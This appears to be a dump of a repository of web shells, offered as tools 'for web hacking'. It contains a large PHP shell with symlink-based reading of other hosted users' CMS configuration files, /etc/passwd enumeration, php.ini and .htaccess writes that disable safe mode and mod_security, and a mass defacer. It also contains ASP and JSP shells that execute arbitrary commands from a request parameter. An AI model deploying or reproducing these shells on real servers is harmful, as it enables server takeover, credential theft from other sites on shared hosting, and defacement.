"; 1059 | $unk = array(); 1060 | foreach($d0mains as $d0main){ 1061 | if(@eregi("zone",$d0main)){ 1062 | preg_match_all('#zone "(.*)"#', $d0main, $domains); 1063 | flush(); 1064 | if(strlen(trim($domains[1][0])) > 2){ 1065 | $unk[] = $domains[1][0]; 1066 | flush(); 1067 | } 1068 | } 1069 | } 1070 | $count=1; 1071 | $unk = array_unique($unk); 1072 | $l=0; 1073 | foreach($unk as $d){ 1074 | $user = posix_getpwuid(@fileowner("/etc/valiases/".$d)); 1075 | echo ""; 1076 | flush(); 1077 | $count++; 1078 | $l=$l?0:1; 1079 | } 1080 | echo "
Domains
".$d."".$user['name']."
"; 1081 | } 1082 | echo "
"; 1083 | } 1084 | if(isset($_POST['p1']) && $_POST['p1']=='whole') 1085 | { 1086 | echo "
"; 1087 | @mkdir('PCAPuNkHoLic_sym',0777); 1088 | $hdt= "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any"; 1089 | $hfp =@fopen ('PCAPuNkHoLic_sym/.htaccess','w'); 1090 | fwrite($hfp ,$hdt); 1091 | if(function_exists('symlink')) { 1092 | @symlink('/','PCAPuNkHoLic_sym/root'); 1093 | } 1094 | $d0mains = @file('/etc/named.conf'); 1095 | if(!$d0mains) { 1096 | echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; 1097 | echo ""; 1098 | $dt = file('/etc/passwd'); 1099 | $l=0; 1100 | foreach($dt as $d) { 1101 | $r = explode(':',$d); 1102 | if(strpos($r[5],'home')) { 1103 | echo ""; 1104 | $l=$l?0:1; 1105 | $j++; 1106 | } 1107 | } 1108 | echo '
Count Domains User Symlink
".$j."---".$r[0]."symlink
'; 1109 | } else { 1110 | echo ""; 1111 | $count=1; 1112 | $mck = array(); 1113 | foreach($d0mains as $d0main){ 1114 | if(@eregi('zone',$d0main)){ 1115 | preg_match_all('#zone "(.*)"#',$d0main,$domain); 1116 | flush(); 1117 | if(strlen(trim($domain[1][0])) >2){ 1118 | $mck[] = $domain[1][0]; 1119 | } 1120 | } 1121 | } 1122 | $mck = array_unique($mck); 1123 | $usr = array(); 1124 | $dmn = array(); 1125 | foreach($mck as $o) { 1126 | $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); 1127 | $usr[] = $infos['name']; 1128 | $dmn[] = $o; 1129 | } 1130 | array_multisort($usr,$dmn); 1131 | $dt = file('/etc/passwd'); 1132 | $passwd = array(); 1133 | foreach($dt as $d) { 1134 | $r = explode(':',$d); 1135 | if(strpos($r[5],'home')) { 1136 | $passwd[$r[0]] = $r[5]; 1137 | } 1138 | } 1139 | $l=0; 1140 | $j=1; 1141 | foreach($usr as $r) { 1142 | echo " 1143 | 1144 | 1145 | "; 1146 | flush(); 1147 | $l=$l?0:1; 1148 | $j++; 1149 | } 1150 | echo '
Count Domains User Symlink
".$count++."'.$dmn[$j-1].' '.$r."symlink
'; 1151 | } 1152 | echo "
"; 1153 | } 1154 | if(isset($_POST['p1']) && $_POST['p1']=='config') 1155 | { 1156 | echo "
"; 1157 | @mkdir('PCAPuNkHoLic_sym',0777); 1158 | $hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \nAddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; 1159 | $hfp = @fopen ('PCAPuNkHoLic_sym/.htaccess','w'); 1160 | @fwrite($hfp ,$hdt); 1161 | if(function_exists('symlink')) { 1162 | @symlink('/','PCAPuNkHoLic_sym/root'); 1163 | } 1164 | $d0mains=@file('/etc/named.conf'); 1165 | if(!$d0mains) { 1166 | echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; 1167 | }else { 1168 | echo ">"; 1169 | $count = 1; 1170 | $l=0; 1171 | foreach($d0mains as $d0main){ 1172 | if(@eregi('zone',$d0main)){ 1173 | preg_match_all('#zone "(.*)"#',$d0main,$domain); 1174 | flush(); 1175 | if(strlen(trim($domain[1][0]))>2){ 1176 | $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0])); 1177 | $c1 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/wp-config.php'; 1178 | $ch01 = get_headers($c1); 1179 | $cf01 = $ch01[0]; 1180 | $c2 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php'; 1181 | $ch02 = get_headers($c2); 1182 | $cf02 = $ch02[0]; 1183 | $c3 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/configuration.php'; 1184 | $ch03 = get_headers($c3); 1185 | $cf03 = $ch03[0]; 1186 | $c4 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php'; 1187 | $ch04 = get_headers($c4); 1188 | $cf04 = $ch04[0]; 1189 | $c5 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/includes/config.php'; 1190 | $ch05 = get_headers($c5); 1191 | $cf05 = $ch05[0]; 1192 | $c6 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php'; 1193 | $ch06 = get_headers($c6); 1194 | $cf06 = $ch06[0]; 1195 | $c7 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php'; 1196 | $ch07 = get_headers($c7); 1197 | $cf07 = $ch07[0]; 1198 | $c8 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'public_html/clients/configuration.php'; 1199 | $ch08 = get_headers($c8); 1200 | $cf08 = $ch08[0]; 1201 | $c9 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/support/configuration.php'; 1202 | $ch09 = get_headers($c9); 1203 | $cf09 = $ch09[0]; 1204 | $c10 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/client/configuration.php'; 1205 | $ch10 = get_headers($c10); 1206 | $cf10 = $ch10[0]; 1207 | $c11 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/submitticket.php'; 1208 | $ch11 = get_headers($c11); 1209 | $cf11 = $ch11[0]; 1210 | $c12 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/client/configuration.php'; 1211 | $ch12 = get_headers($c12); 1212 | $cf12 = $ch12[0]; 1213 | $c13 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/includes/configure.php'; 1214 | $ch13 = get_headers($c13); 1215 | $cf13 = $ch13[0]; 1216 | $c14 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/include/app_config.php'; 1217 | $ch14 = get_headers($c14); 1218 | $cf14 = $ch14[0]; 1219 | $c15 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php'; 1220 | $ch15 = get_headers($c15); 1221 | $cf15 = $ch15[0]; 1222 | $out = ' '; 1223 | if(strpos($cf01,'200') == true){ $out = "Wordpress"; } 1224 | elseif(strpos($cf02,'200') == true){ $out = "Wordpress"; } 1225 | elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " WHMCS"; } 1226 | elseif(strpos($cf09,'200') == true){ $out = " WHMCS";} 1227 | elseif(strpos($cf10,'200') == true){ $out = " WHMCS"; } 1228 | elseif(strpos($cf03,'200') == true){ $out = " Joomla"; } 1229 | elseif(strpos($cf04,'200') == true){ $out = " Joomla"; } 1230 | elseif(strpos($cf05,'200') == true){ $out = " vBulletin";} 1231 | elseif(strpos($cf06,'200') == true){ $out = " vBulletin";} 1232 | elseif(strpos($cf07,'200') == true){ $out = " vBulletin";} 1233 | elseif(strpos($cf08,'200') == true){ $out = " Client Area";} 1234 | elseif(strpos($cf12,'200') == true){ $out = " Client Area";} 1235 | elseif(strpos($cf13,'200') == true){ $out = " osCommerce/Zen Cart";} 1236 | elseif(strpos($cf14,'200') == true){ $out = " Magento";} 1237 | elseif(strpos($cf15,'200') == true){ $out = " Drupal";} 1238 | else { 1239 | continue; 1240 | } 1241 | echo ''; 1242 | flush(); 1243 | $l=$l?0:1; 1244 | } 1245 | } 1246 | } 1247 | echo "
Count Domain User Script
'.$count++.''.$domain[1][0].''.$user['name'].''.$out.'
"; 1248 | } 1249 | echo "
"; 1250 | } 1251 | echo ""; 1252 | printFooter(); 1253 | } 1254 | function actionJumping() 1255 | {printHeader(); 1256 | echo ''.getenv("HTTP_HOST").' - Jumping Server'; 1257 | ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('Error: Safe_mode = On'); 1258 | set_time_limit(0);@$passwd = fopen('/etc/passwd','r');if (!$passwd) { die('[-] Error : Coudn`t Read /etc/passwd'); } 1259 | $pub = array();$users = array();$conf = array();$i = 0;while(!feof($passwd)){$str = fgets($passwd);if ($i > 100){ $pos = strpos($str,':');$username = substr($str,0,$pos);$dirz = '/home/'.$username.'/public_html/';if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username);array_push($pub,$dirz); }}}$i++;} 1260 | echo ' [-]==================[ START ]==================[-]
'; 1261 | foreach ($users as $user){echo " [+] /home/$user/public_html/
";} echo "\n
[-]==================[ FINISH ]==================[-]
\n"; echo ''; 1262 | printFooter(); 1263 | } 1264 | function actionSubdomain() { 1265 | printHeader(); 1266 | error_reporting(0); 1267 | $user = get_current_user(); 1268 | $open = opendir('/home/' . $user . '/access-logs/'); 1269 | while ($dir = readdir($open)) { 1270 | $totalDoamin[] = $dir; 1271 | } 1272 | closedir($open); 1273 | $total = count($totalDoamin); 1274 | $domain = $total - 2; 1275 | if ($domain > 0) { 1276 | echo "

~ Total " . $domain . " Sub Domain Found! ~

"; 1277 | } else { 1278 | echo "

~ 0 Sub Domain Found! ~

"; 1279 | } 1280 | $scan = array_diff(scandir('/home/' . $user . '/access-logs/'), array('.')); 1281 | $domains = implode(" 1282 | http://", $scan); 1283 | echo ' 1284 | '; 1291 | printFooter(); 1292 | } 1293 | function actionSym() { 1294 | printHeader(); 1295 | $file = @implode(@file("/etc/named.conf")); 1296 | if (!$file) { 1297 | die("# can't ReaD -> [ /etc/named.conf ]"); 1298 | } 1299 | preg_match_all("#named/(.*?).db#", $file, $r); 1300 | $domains = array_unique($r[1]); 1301 | { 1302 | foreach ($domains as $domain) { 1303 | $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain)); 1304 | $array= "
http://$domain
"; 1305 | $lol= '' . get_current_user(); 1306 | if (strpos($array, "$lol") == false) { 1307 | $shared = str_replace(array(" $lol"), "", $array); 1308 | echo "
$shared"; 1309 | } 1310 | } 1311 | } 1312 | printFooter(); 1313 | } 1314 | function actionBypass() { 1315 | printHeader(); 1316 | echo '

Safe Mode

'; 1317 | echo '
'; 1318 | echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh] files create in following dir
| ".$GLOBALS['cwd']." |

"; 1319 | echo '| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) |
'; 1320 | if(!empty($_POST['p2']) && isset($_POST['p2'])) 1321 | { 1322 | $fil=fopen($GLOBALS['cwd'].".htaccess","w"); 1323 | fwrite($fil,' 1324 | Sec------Engine Off 1325 | Sec------ScanPOST Off 1326 | '); 1327 | fclose($fil); 1328 | } 1329 | if(!empty($_POST['p1'])&& isset($_POST['p1'])) 1330 | { 1331 | $fil=fopen($GLOBALS['cwd']."php.ini","w"); 1332 | fwrite($fil,'safe_mode=OFF 1333 | disable_functions=NONE'); 1334 | fclose($fil); 1335 | } 1336 | if(!empty($_POST['p3']) && isset($_POST['p3'])) 1337 | { 1338 | $fil=fopen($GLOBALS['cwd'].".htaccess","w"); 1339 | fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI 1340 | AddType application/x-httpd-cgi .sh 1341 | AddHandler cgi-script .pl 1342 | AddHandler cgi-script .pl'); 1343 | fclose($fil); 1344 | } 1345 | echo "


"; 1346 | echo '
'; 1347 | printFooter(); 1348 | } 1349 | function actionDeface() { 1350 | printHeader(); 1351 | echo "

Mass Defacer by PuNkHoLic

"; 1352 | ?> 1353 | 1354 |

Folder: 1355 |
file name : 1356 |
Text Content : 1357 |

1358 | Done

"; 1371 | } 1372 | } 1373 | } 1374 | echo '
'; 1375 | printFooter(); 1376 | } 1377 | function actionDomain() { 1378 | printHeader(); 1379 | echo '

Local Domains

'; 1380 | $file = @implode(@file("/etc/named.conf")); 1381 | $Domain_path = "/var/named"; 1382 | if (!$file) { 1383 | $domains = scandir($Domain_path); 1384 | $count=1; 1385 | $dc = 0; 1386 | echo " 1387 | 1388 | "; 1389 | foreach ($domains as &$domain) { 1390 | if (stripos($domain,".db")) { 1391 | $domain = str_replace('.db','',$domain); 1392 | } 1393 | if (strlen($domain) > 6) { 1394 | echo ""; 1395 | } 1396 | } 1397 | echo "
There are : ( " . count($domains) . " ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink.
NoDomainUser
".$count++."".$domain."User
"; 1398 | }else{ 1399 | $count = 1; 1400 | preg_match_all("#named/(.*?).db#", $file, $r); 1401 | $domains = array_unique($r[1]); 1402 | echo " 1403 | 1404 | "; 1405 | foreach ($domains as $domain) { 1406 | $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain)); 1407 | echo ""; 1408 | } 1409 | } 1410 | printFooter(); 1411 | } 1412 | if( empty($_POST['a']) ) 1413 | if(isset($default_action) && function_exists('action' . $default_action)) 1414 | $_POST['a'] = $default_action; 1415 | else 1416 | $_POST['a'] = 'SecInfo'; 1417 | if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) 1418 | call_user_func('action' . $_POST['a']) 1419 | ?> 1420 | -------------------------------------------------------------------------------- /PHP/wso2.8.5.php: -------------------------------------------------------------------------------- 1 | 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Web-Shells 2 | Some of the best web shells that you might need for web hacking! 3 | 4 | # Basic Web Shells 5 | | Name | Language | Availability | 6 | |------|------|------| 7 | | shell.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/shell.php) | PHP | 8 | | shell.asp | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/shell.asp) | ASP | 9 | | shell.jsp | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/shell.jsp) | JSP | 10 | 11 | # Language-specific Web Shells 12 | 13 | ## PHP 14 | | Name | Availability | 15 | |------|------| 16 | | alfav3-encoded.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/alfa/alfav3-encoded.php) | 17 | | alfav4.1-decoded.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/alfa/alfav4.1-decoded.php) | 18 | | alfav4.1-encoded.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/alfa/alfav4.1-encoded.php) | 19 | | andela.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/andela.php) | 20 | | bloodsecv4.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/bloodsecv4.php) | 21 | | by.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/by.php) | 22 | | c99ud.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/c99ud.php) | 23 | | cmd.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/cmd.php) | 24 | | configkillerionkros.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/configkillerionkros.php) | 25 | | mini.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/mini.php) | 26 | | obfuscated-punknopass.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/obfuscated-punknopass.php) | 27 | | punk-nopass.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/punk-nopass.php) | 28 | | punkholic.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/punkholic.php) | 29 | | r57.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/r57.php) | 30 | | smevk.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/smevk.php) | 31 | | TwemlowsWebShell.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/TwemlowsWebShell.php) | 32 | | wso2.8.5.php | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/wso2.8.5.php) | 33 | 34 | ## ASP 35 | | Name | Availability | 36 | |------|------| 37 | | pouya.asp | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/ASP/pouya.asp) | 38 | 39 | ## JSP 40 | | Name | Availability | 41 | |------|------| 42 | | shell.jsp | [Find Here!](https://github.com/TheBinitGhimire/Web-Shells/blob/master/JSP/shell.jsp) | 43 | -------------------------------------------------------------------------------- /shell.asp: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | <% 14 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 15 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 16 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 17 | Function getCommandOutput(theCommand) 18 | Dim objShell, objCmdExec 19 | Set objShell = CreateObject("WScript.Shell") 20 | Set objCmdExec = objshell.exec(thecommand) 21 | getCommandOutput = objCmdExec.StdOut.ReadAll 22 | end Function 23 | %> 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 
33 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
34 | <%Response.Write(Request.ServerVariables("server_name"))%>
35 | 

36 | The server's port:
37 | <%Response.Write(Request.ServerVariables("server_port"))%>
38 | 

39 | 

40 | The server's software:
41 | <%Response.Write(Request.ServerVariables("server_software"))%>
42 | 

43 | 

44 | The server's local address:
45 | <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
46 | <% szCMD = request("cmd")
47 | thisDir = getCommandOutput("cmd /c" & szCMD)
48 | Response.Write(thisDir)%>
49 | 

50 | 

51 | 
52 | 
53 | 


--------------------------------------------------------------------------------
/shell.jsp:
--------------------------------------------------------------------------------
 1 | <%-- Source: https://gist.github.com/ErosLever/7445a3cfaaf80f1f5a53 --%>
 2 | <%-- For more JSP shells, visit the JSP directory at https://github.com/TheBinitGhimire/Web-Shells!  --%>
 3 | <%@ page
 4 | import="java.util.*,java.io.*"%>
 5 | <%
 6 | %>
 7 | 
 8 | 
 9 | 
JSP SHELL

10 | 

12 | 
13 | 
14 | 
15 | 
16 | <%
17 | if (request.getParameter("cmd") != null) {
18 | out.println("Command: " +
19 | request.getParameter("cmd") + "
");
20 | Process p =
21 | Runtime.getRuntime().exec(request.getParameter("cmd"));
22 | OutputStream os = p.getOutputStream();
23 | InputStream in = p.getInputStream();
24 | DataInputStream dis = new DataInputStream(in);
25 | String disr = dis.readLine();
26 | while ( disr != null ) {
27 | out.println(disr);
28 | disr = dis.readLine();
29 | }
30 | }
31 | %>
32 | 

33 | 
34 | 
35 | 


--------------------------------------------------------------------------------
/shell.php:
--------------------------------------------------------------------------------
1 | 
9 | 


--------------------------------------------------------------------------------
There are( " . count($domains) . " ) Domains in this Sever.I think you have got something this time yeah!!!.
NoDomainUser
".$count++."".$domain."".$user['name']."